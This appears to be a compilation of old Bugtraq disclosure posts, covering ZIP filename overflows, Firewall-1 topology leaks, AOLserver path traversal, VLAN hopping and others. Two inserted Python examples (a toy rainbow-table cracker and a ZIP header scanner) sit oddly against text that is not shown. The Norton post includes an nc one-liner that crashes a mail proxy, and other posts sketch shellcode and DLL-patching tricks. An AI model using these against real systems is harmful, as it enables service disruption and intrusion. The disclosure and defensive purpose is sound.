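The precomputation the post describes, reduced to a toy domain as an added example (this is not the LASEC tool's code). It assumes 3-letter lowercase passwords and an unsalted MD5 standing in for the LanMan hash, builds a small rainbow table (column-dependent reduction functions, as in the Oech03 paper), inverts a hash with far fewer hash operations than the brute-force half of the key space, and then shows that the same table is useless once a per-user salt (which LanMan lacks) is mixed into the hash.

```python
import hashlib
import random

# Constructed toy parameters (assumptions, not the LASEC tool): 3-letter
# lowercase passwords and an unsalted MD5 standing in for the LanMan hash.
ALPHABET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN = 3
SPACE = len(ALPHABET) ** PW_LEN   # 17576 candidate passwords
CHAIN_LEN = 40                    # t: hash/reduce steps per chain
NUM_CHAINS = 2500                 # m: chains kept in the table

def index_to_pw(n):
    """Map an integer in [0, SPACE) to a password string."""
    chars = []
    for _ in range(PW_LEN):
        chars.append(ALPHABET[n % len(ALPHABET)])
        n //= len(ALPHABET)
    return "".join(chars)

def unsalted_hash(pw):
    return hashlib.md5(pw.encode()).digest()

def salted_hash(pw, salt):
    return hashlib.md5(salt + pw.encode()).digest()

def reduce_(digest, column):
    """Column-dependent reduction: hash -> some password. Using a different
    reduction per column is what makes this a rainbow table, not a Hellman one."""
    return index_to_pw((int.from_bytes(digest[:8], "big") + column) % SPACE)

def build_table(seed=1):
    """Precompute m chains of length t; store only (endpoint -> start) pairs."""
    rng = random.Random(seed)
    table = {}
    for _ in range(NUM_CHAINS):
        start = index_to_pw(rng.randrange(SPACE))
        pw = start
        for col in range(CHAIN_LEN):
            pw = reduce_(unsalted_hash(pw), col)
        table.setdefault(pw, start)   # first chain wins when endpoints merge
    return table

def lookup(table, target):
    """Try to invert target. Returns (password or None, hash operations spent)."""
    ops = 0
    for col in range(CHAIN_LEN - 1, -1, -1):
        # Hypothesis: target sits at column `col`; finish the chain from there.
        pw = reduce_(target, col)
        for c in range(col + 1, CHAIN_LEN):
            pw = reduce_(unsalted_hash(pw), c)
            ops += 1
        if pw in table:
            # Endpoint hit (possibly a false alarm): replay the stored chain.
            cand = table[pw]
            for c in range(CHAIN_LEN):
                h = unsalted_hash(cand)
                ops += 1
                if h == target:
                    return cand, ops
                cand = reduce_(h, c)
    return None, ops

def demo():
    """Crack a password the table is known to cover, then show the same table
    is useless against a salted hash of that password."""
    table = build_table()
    victim = index_to_pw(random.Random(1).randrange(SPACE))  # start of chain 0
    found, ops = lookup(table, unsalted_hash(victim))
    salted_found, _ = lookup(table, salted_hash(victim, b"per-user-salt"))
    return victim, found, ops, salted_found
```

The table costs m*t hash operations once; every later lookup costs at most about t*t/2 plus chain replays, which is the trade-off the post quantifies with 0.95GB versus 4 million operations.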



Re: Can't Preventing exploitation with rebasing

2003-02-05 Thread bugtraq
All difficulties posed by such a rebasing technique can be conquered.
The only difficulty it presents is getting back to your shellcode.  This
can be overcome easily unless you're remapping kernel memory as well.
The kernel holds secrets to finding loadlibrary and getprocaddress, and a
jmp esp which is all you need to make your shellcode dance.

DIGRESSION:
Dave Litchfield says you can call esp.  I don't know Dave's
relationships with his registers but this doesn't work if I want
to get my eip on top of my shellcode.  Always starts executing a
memory address for me.  Maybe if I took esp out to dinner more
often then I could call it instead of having to jump on top of it.
Dave, any suggestions for the wine list?
END DIGRESSION.

There's no silver bullet for security.  Security is in a fluid state
always, and will always be so.

-Jove

 Brian Hatch [EMAIL PROTECTED] wrote:
  People keep saying but it won't stop everything, and that's true.

   This takes the security versus obscurity argument from the realm of
 personal opinion to one of quantitative statements.  We should have a
 similar goal for this discussion.




Open WebMail 1.71 background magic info

2002-11-23 Thread FreeBSDbr Bugtraq DataBase
Hello Folks,

Open Webmail is a perl webmail program that runs on UNIX operating systems. 
For more about Open WebMail, its official website is http://openwebmail.org/.

Ok, let's talk about the problem.

I've tested Open WebMail 1.71 and when you enter an invalid username (user 
that doesn't exist on the system), the 
WebMail returns to you a very nice screen like it:

---
Open WebMail ERROR 

user does not exist 

Open WebMail version 1.71 
---

Ok, now try to copy with your mouse all the message that returned to you, 
and...

---
Open WebMail ERROR 

user does not exist 
euid=0, egid=80 80 80, mailgid=6 

Open WebMail version 1.71 
---

...KABOOM! Look what magically appears:

euid=0, egid=80 80 80, mailgid=6

All right, let's verify the information:

ps aux
root9044  0.0  3.0  3248 2776  ??  R10:29AM   
0:00.40 /usr/bin/perl -T /usr/local/www/cgi-bin/openwebmail/.openwebmail.pl

As you can see above, the perl script runs as root, and we can know it just 
with the magical information that appears on the very nice screen.

That could be the beginning of an attack... known information. 

Yeah guys, something is wrong... Some information is better than we can 
imagine, and some information like it to the wrong (or right) guys... :)

Hugs,

Felipe Neuwald
[EMAIL PROTECTED]

--
FreeBSDbr.com.br



R7-0004: Multiple Vendor Long ZIP Entry Filename Processing

2002-10-10 Thread bugtraq-return-6791

From: Rapid 7 Security Advisories [EMAIL PROTECTED]
Date: Wed, 2 Oct 2002 22:48:29 -0700

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

___
 Rapid 7, Inc. Security Advisory

Visit http://www.rapid7.com/ to download NeXpose(tm), our
 advanced vulnerability scanner. Linux and Windows 2000
   versions are available now!
___

   Rapid 7 Advisory R7-0004
   Multiple Vendor Long ZIP Entry Filename Processing Issues

   Published:  October 2, 2002
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0004.txt

   CERT:   CERT Vulnerability Note VU#383779
   http://www.kb.cert.org/vuls/id/383779

   Microsoft:  Microsoft Security Advisory MS02-054
   http://www.microsoft.com/technet/security/bulletin/MS02-054.asp

   CVE:CAN-2002-0370
   http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0370

1. Affected system(s):

   Several different vendors and products were tested.  Many were found
   to be vulnerable.  A partial list of affected vendors follows.

   Detailed results for many vendors are being withheld pending their
   response to the issues described in this advisory.  We encourage
   customers to engage your vendors on this issue if you have any
   questions regarding their handling of specially crafted ZIP files.

   For an up-to-date list of vendor statements, see CERT Vulnerability
   Note VU#383779.

   KNOWN VULNERABLE:
o Microsoft Windows XP
o Microsoft Windows ME
o Microsoft Windows 98 With Plus! Pack
o Lotus Notes R4
o Lotus Notes R5
o Lotus Notes R6 (pre-gold)
o Verity, Inc. KeyView viewing SDK
o Aladdin Systems Stuffit Expander (pre 7.0)

   Apparently NOT VULNERABLE:
o WinRAR is believed to be NOT vulnerable
o WinZip 8.x is believed to be NOT vulnerable
o zlib is believed to be NOT vulnerable

2. Summary

   Products and libraries from multiple vendors are deficient
   in their handling of zip files having entries with long
   filenames.  Typically, opening and/or processing these
   crafted zip files will result in the program crashing or
   exhibiting unpredictable behavior.  There is a possibility
   of arbitrary code execution, but no exploits are known at
   this time.

3. Vendor status and information

   This is a partial list of affected products and vendors.
   We will update our advisory as we get feedback from more
   vendors.  You may check back with us at
   ( http://www.rapid7.com/SecurityResearch.html ).

   Microsoft Windows XP
  Explorer.exe crashes when navigating through specially
  crafted ZIP files.

  The shell (Explorer.exe) in Windows XP provides functionality
  to uncompress ZIP files on-the-fly, and presents them as folders
  that users can navigate through.  There exists a buffer overflow
  in this feature which may allow malicious ZIP files to be
  constructed that execute code upon access.  It should be noted
  that Explorer.exe does not display the filename if it is too
  long.  This may work to an attacker's advantage since suspicious
  filenames would be hidden from the user.

  Microsoft was notified of this issue, and a fix is available. More
  information can be found in Microsoft Security Advisory MS02-054.
  This issue has been assigned a CVE ID of CAN-2002-0370.

   Microsoft Windows ME
  Windows ME provides functionality to uncompress ZIP files
  on-the-fly, and presents them as folders that users can navigate
  through.  There exists a buffer overflow in this feature
  which may allow malicious ZIP files to be constructed that
  execute code upon access.

  Microsoft was notified of this issue, and a fix is available. More
  information can be found in Microsoft Security Advisory MS02-054.
  This issue has been assigned a CVE ID of CAN-2002-0370.


   Microsoft Windows 98 With Plus! Pack
  Windows 98 provides functionality to uncompress ZIP files
  on-the-fly, and presents them as folders that users can navigate
  through.  There exists a buffer overflow in this feature
  which may allow malicious ZIP files to be constructed that
  execute code upon access.

  Microsoft was notified of this issue, and a fix is available. More
  information can be found in Microsoft Security Advisory MS02-054.
  This issue has been assigned a CVE ID of CAN-2002-0370.

   Lotus Notes Client R4
  Lotus Notes Client R4 crashes when viewing certain zip files
  using the built-in attachment viewer.

  The R4 Lotus Notes client 
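The bug class in this advisory is a reader that trusts the filename length field of a ZIP local file header. As an added example (not Rapid 7's or any vendor's code), the scanner below walks the local headers of an archive without trusting them: it checks that the declared name and extra bytes actually exist before reading them and flags names over an assumed policy limit (260, Windows MAX_PATH; the advisory gives no threshold), which is the check a gateway or attachment scanner would apply to the files described above.

```python
import io
import struct
import zipfile

# Assumed policy limit (not from the advisory): Windows MAX_PATH is 260 chars.
MAX_NAME_LEN = 260
# PKZIP local file header: sig, version, flags, method, time, date, crc,
# compressed size, uncompressed size, name length, extra length (30 bytes).
LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")
LOCAL_SIG = b"PK\x03\x04"

def scan_local_headers(data, max_name_len=MAX_NAME_LEN):
    """Walk the local file headers of a ZIP without trusting them.

    Returns (entries_seen, findings); each finding is (offset, name_len,
    reason). A reader that copies name_len bytes into a fixed buffer, or
    reads them without checking they exist, has the bug the advisory describes."""
    findings = []
    entries = 0
    pos = 0
    while pos + LOCAL_HDR.size <= len(data):
        if data[pos:pos + 4] != LOCAL_SIG:
            break  # reached the central directory (or trailing garbage)
        (_sig, _ver, flags, _method, _t, _d, _crc, csize, _usize,
         name_len, extra_len) = LOCAL_HDR.unpack_from(data, pos)
        entries += 1
        hdr_end = pos + LOCAL_HDR.size
        if hdr_end + name_len + extra_len > len(data):
            findings.append((pos, name_len, "name/extra runs past end of file"))
            break
        if name_len > max_name_len:
            findings.append((pos, name_len, "filename longer than policy limit"))
        if flags & 0x0008:
            break  # sizes live in a trailing data descriptor; stop walking
        pos = hdr_end + name_len + extra_len + csize
    return entries, findings

def make_zip(names):
    """Constructed sample archive (stored, one byte per entry) for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name in names:
            zf.writestr(name, b"x")
    return buf.getvalue()
```

A production scanner would also cross-check the central directory, which carries its own copy of each filename and length.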

Re: Firewall-1 Information leak

2001-07-19 Thread Bugtraq Account

On Wed, 18 Jul 2001, Haroon Meer wrote:

 Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
 to create encrypted sessions between users and FW-1 modules. Before remote
 users are able to communicate with internal hosts, a network topology of
 the protected network is downloaded to the client. While newer versions of
 the FW-1 software have the ability to restrict these downloads to only
 authenticated sessions, the default setting allows unauthenticated
 requests to be honoured. This gives a potential attacker a wealth of
 information including ip addresses, network masks (and even friendly
 descriptions)

This is a well-known, and generally accepted, risk associated with running
FWZ SecuRemote VPNs to FireWall-1.  As others have already commented, it
is possible to turn off unauthenticated topology downloads through the
policy properties.  If you do this, you will need to manually distribute a
userc.C file (containing the topology information) to all of your
secuRemote users.  This file should be loaded into the
c:\winnt\fw\database directory on the client.

From start to finish, the procedure should go something like this:

1. Set up your firewall gateway for VPN, with the Respond to
unauthenticated topology requests enabled.

2. Set up a sample secuRemote client, and download the site topology.

3. Turn off Respond to unauthenticated topology requests.

4. Securely distribute the file userc.C from the sample client to all
secuRemote users.

You will need to send out an updated userc.C any time there is a change to
the encryption domain or keying info.

Regards,
Dave Taylor







Norton Antivirus 2000 Poproxy.exe problem

2001-05-24 Thread bugtraq

Poproxy.exe is the email virus scanner included in Norton Antivirus 2000 (maybe
other versions too). It listens on port 110 and acts as a mail server,
retrieving your mail then scanning it, and passing it along to the mail client
(I think).

While messing around with this I crashed the server by sending it
too many characters (269 or more). Once the program crashes the
user is unable to receive email until the next reboot (or poproxy.exe is run
again).

Example:
perl -e 'print "A" x 269' | nc 10.0.2.1 110

where 10.0.2.1 is the windows machine running poproxy.exe

The output I got was:
POPROXY caused an invalid page fault in module MFC42.DLL at 014f:5f490453.
Registers:
EAX= CS=014f EIP=5f490453 EFLGS=00010246
EBX= SS=0157 ESP=02b1fc00 EBP=02b1fc14
ECX=007c0f28 DS=0157 ESI= FS=381f
EDX= ES=0157 EDI=007c0ef8 GS=1247
Bytes at CS:EIP:
89 7e 04 e8 ac 49 f8 ff 53 56 ff 76 04 e8 a7 48
Stack dump:
   00a136b0  41414141 5f419f09 007c0ef8 00a11f20 
007c0f60 0001 5f419f09 0009 010d 0001 5f419e84


Can anyone else confirm this?




Win2k directory services weakness

2001-02-21 Thread BugTraq

Hello,

we came across one security issue; which may be critical
for large organizations planning to deploy Windows 2000
and Active Directory in one forest.

Imagine that there is a forest with more than one domain.
(Tree hierarchy does not matter in this situation.) Every
domain has its own set of administrators.

In Active directory there is one Configuration Container
for the whole forest. So every domain controller has its own
copy of Configuration Container and is able to change it and
replicate changes to other domain controllers. The only
obstruction for changing configuration are ACLs.
But ACLs are checked on local system and if you somehow
modify it to avoid this checking, you can modify this Container.

How to do it? It is just a matter of finding a place where
the ACL is checked and patching the corresponding DLL to disable this check.

We think the check is done in Directory Service Agent. So
you can patch and replace it or add a patched version to
original one running in the context of LSA - for how to run
own code in the context of LSA, see pwdump2
http://razor.bindview.com/tools/desc/pwdump2_readme.html utility.
What you need in this case is SeDebugPrivilege.

The real issue is: if in this situation one of the domain controllers
is hacked, the hacker can change links for the Site Domain policy, where
the paths for logon/logoff and startup/shutdown scripts are stored,
and so run their own code on any other domain controller in the forest.

If you have a large organization, every DC is then (almost) equally
vulnerable; if a hacker breaks into one, he gets all.

Has anyone thought about this issue, and does anyone have any
idea how to solve it?

Thank you.

Michal Zeman, Pavol Mederly
Comenius University, Bratislava, Slovakia



Re: Vulnerability in AOLserver

2001-02-09 Thread bugtraq

AOLserver v3.2 is a web server available from http://www.aolserver.com.
A vulnerability exists which allows a remote user to break out of the
web root using relative paths (ie: '...').

 AOLserver v3.2 on Linux (RH 6.0) does not appear to be vulnerable.
 OS-dependent code?

Correct.  Microsoft Windows has an undocumented "feature" where '...\' or
'\' or '..\' point to parent directories.  This feature is obscure and
undocumented enough that almost every single web server ported to Windows
allows viewing of files above the document root with this feature.  In
fact, Microsoft's own personal web server had this problem at one point.

Linux has had similar problems with undocumented interfaces.  It was
discovered about a year ago that by using undocumented calls that restrict
privileges, an attacker could set things up so that a SUID root application
could not drop its root privileges.

- Sam



Veritas BackupExec (remote DoS)

2001-01-15 Thread oh3mqu+bugtraq

Hello,

I am using a Backup system from Veritas Software (http://www.veritas.com/)
and its Linux agent.  That agent listens on a TCP socket (8192 in my
system) and if someone makes a connection to that socket but does not send
anything to it, the agent hangs forever, even if you close that
connection.  For example, port scanners make it hang.

I think that the problem is that the software is not using select()
function calls before read() calls and it is not using threads either.

I reported that to Veritas and they replied "Unfortunately our Backup
Exec Desktop Products do not support backing up Linux machines.  I'm
afraid we would be unable to assist you in this instance, however
thank you for your interest."

--
Ari Saastamoinen
[EMAIL PROTECTED]



Re: Microsoft Security Bulletin (MS00-005)

2000-01-19 Thread bugtraq

Interesting that this is not a part of Windows 98's Windows
Update.  If it was a serious enough vulnerability to fix you would think
that it would also be easy to download and install without subscribing to
any security related lists.  :

_John

On Mon, 17 Jan 2000, Microsoft Product Security wrote:

 The following is a Security  Bulletin from the Microsoft Product Security
 Notification Service.

 Please do not  reply to this message,  as it was sent  from an unattended
 mailbox.
 

 Microsoft Security Bulletin (MS00-005)
 --

 Patch Available for "Malformed RTF Control Word" Vulnerability
 Originally Posted: January 17, 2000

 Summary
 ===
 Microsoft has released a patch that eliminates a security vulnerability in
 the Rich Text Format (RTF) reader that ships as  part of Microsoft(r)
 Windows(r) 95 and 98, and Windows NT(r) 4.0. Under certain conditions, the
 vulnerability could be used  to cause email programs to crash.

 Frequently asked questions regarding this vulnerability can be found at
 http://www.microsoft.com/security/bulletins/MS00-005faq.asp.

{SNIP}

 Affected Software Versions
 ==
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows 98 Second Edition
  - Microsoft Windows NT 4.0 Workstation
  - Microsoft Windows NT 4.0 Server
  - Microsoft Windows NT 4.0 Server, Enterprise Edition
  - Microsoft Windows NT 4.0 Server, Terminal Server Edition

 NOTE: Windows 2000 is not affected by this vulnerability.

 Patch Availability
 ==
  - Windows 95:
http://www.microsoft.com/windows95/downloads/contents/
WUCritical/rtfcontrol/default.asp
  - Windows 98:
http://www.microsoft.com/windows98/downloads/contents/
WUCritical/rtfcontrol/default.asp
  - Windows NT 4.0 Workstation, Windows NT 4.0 Server, and
Windows NT 4.0 Server, Enterprise Edition:
Intel:
   http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17510
Alpha:
   http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17511
  - Windows NT 4.0 Server, Terminal Server Edition:
To be released shortly.
{SNIP}



VLAN Security

1999-09-02 Thread bugtraq

To Bugtraq,

We have recently conducted some testing into the security of the
implementation of VLANs on a pair of Cisco Catalyst 2900 series
switches and we feel that the results of this testing might be of some
value to the readers.  Testing basically involved  injecting 802.1q
frames with forged VLAN identifiers into the switch in an attempt to
get the frame to jump VLANs.  A brief background is included below for
those that might not be too familiar with VLANs.  Others should skip
to the end for the results.

Background
==
Virtual LAN (VLAN) technology is used to create logically separate
LANs on the same physical switch.  Each port of the switch is assigned
to a VLAN.  In the case of the Cisco Catalyst, VLAN'ing is done at
layer 2 of the OSI network model, which means that a layer 3 device
(router) is required to get traffic between VLANs (possibly a
filtering device).

In addition to the above, VLANs may be extended beyond a single switch
through the use of trunking between the switches.  The trunk allows
VLANs to exist on multiple switches.  To preserve VLAN information
across the trunk, the ethernet frame is 'wrapped' in a trunking
protocol.  Cisco have their own proprietary trunking protocol, but
they also support the emerging 802.1q standard - we used 802.1q
trunking in these tests.

Basically, 802.1q adds a tag to the ethernet frame that specifies the
VLAN that the frame belongs to.  Thus, when it is transported between
switches over the trunk, it is possible for the receiving switch to
send the frame to the correct VLAN.  In Cisco's implementation of
802.1q the tag is four bytes long and has the format "0x 80 00 0n nn"
where nnn is the VLAN identifier.  The tag is inserted into the
ethernet frame immediately after the source MAC address.  So, an
ethernet frame entering switch 1 on a port that belongs to VLAN 4 has
the tag "80 00 00 04" inserted.  The 802.1q frame traverses the switch
trunk and the tag is stripped from the frame before the frame leaves
the destination switch port.

For more information on 802.1q -
http://grouper.ieee.org/groups/802/1/vlan.html

During our tests we used the packet generation tool of Network
Associates' Sniffer Pro v 2 to generate 802.1q frames with modified
VLAN identifiers in an attempt to get frames to hop VLANs without the
intervention of a layer 3 device.

Findings
===

We found that under specific conditions it was possible to inject
frames into one VLAN and have them 'hop' to a different VLAN.  This is
a serious concern if the VLAN mechanism is being used to maintain a
security gradient between two network segments.  This has been
discussed with Cisco and we believe that it is an issue with the
802.1q specification rather than an implementation issue.

The trunk port, along with all the other ports, must be assigned to a
VLAN.  If some non-trunk ports on the switch share the same VLAN as
the trunk port, then it is possible to inject modified 802.1q frames
into these non-trunk ports, and have the frames hop to other VLANs on
another switch.

eg.
Switch 1 has ports 1-12 on VLAN 1
Switch 1 has ports 13-23 on VLAN 2
Switch 1 has port 24 configured as an 802.1q trunk (VLAN 1)
Switch 2 has ports 1-12 on VLAN 1
Switch 2 has ports 13-23 on VLAN 2
Switch 2 has port 24 configured as an 802.1q trunk (VLAN 1)
Machine 1 is on port 1, switch 1.
Machine 2 is on port 13, switch 2.

We can send 802.1q frames with the following details...
Source MAC = Machine 1
Destination MAC = Machine 2
VLAN ID = VLAN 2
...from machine 1 and they will arrive at machine 2.

This will only occur if the trunk port belongs to the same VLAN as
machine 1.
* We tried this only for the trunk belonging to VLAN 1.  We expect
that similar results would be achieved if machine 1 and the trunk port
shared VLAN 3, 4, ...

Implications
===

This is a problem if the following conditions are met:
1. The attacker has access to a switch port on the same VLAN as the
   trunk.
2. The target machine is on a different switch.
3. The attacker knows the MAC address of the target machine.

In a real-life scenario, there may also be a requirement for some
layer 3 device to provide a connection from VLAN 2 back to VLAN 1.

Recommendations
===
Try not to use VLANs as a mechanism for enforcing security policy.
They are great for segmenting networks, reducing broadcasts and
collisions and so forth, but not as a security tool.

If you MUST use them in a security context, ensure that the trunking
ports have a unique native VLAN number.

Final Notes
===
Thanks to those at Cisco who assisted in the handling of this issue.
The two switches used for testing were WS-C2924M-XL's.  They were both
running 11.2(8)SA5.
Additional information on test configuration will be made available on
request.

Regards,

Dave Taylor ([EMAIL PROTECTED])
Steve Schupp([EMAIL PROTECTED])